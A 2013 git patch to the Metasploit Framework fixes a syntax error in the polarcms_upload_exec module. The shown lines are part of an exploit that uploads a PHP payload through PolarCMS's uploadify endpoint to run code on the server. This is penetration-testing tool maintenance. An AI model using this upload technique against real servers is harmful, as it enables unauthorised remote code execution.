From abdcde06cd20f87eef9ab3837461e2789e568c67 Mon Sep 17 00:00:00 2001
From: Joe Rozner <joe@deadbytes.net>
Date: Mon, 25 Feb 2013 22:58:26 -0800
Subject: [PATCH] Fix polarcms_upload_exec exploit

---
 modules/exploits/multi/http/polarcms_upload_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/http/polarcms_upload_exec.rb b/modules/exploits/multi/http/polarcms_upload_exec.rb
index a45cecfd06..b3dc7c338f 100644
--- a/modules/exploits/multi/http/polarcms_upload_exec.rb
+++ b/modules/exploits/multi/http/polarcms_upload_exec.rb
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		data = Rex::MIME::Message.new
 		data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
-		data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/',, nil, nil, "form-data; name=\"folder\"")
+		data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/', nil, nil, "form-data; name=\"folder\""))
 		post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
 		print_status("#{peer} - Uploading payload #{@payload_name}")
 		res = send_request_cgi({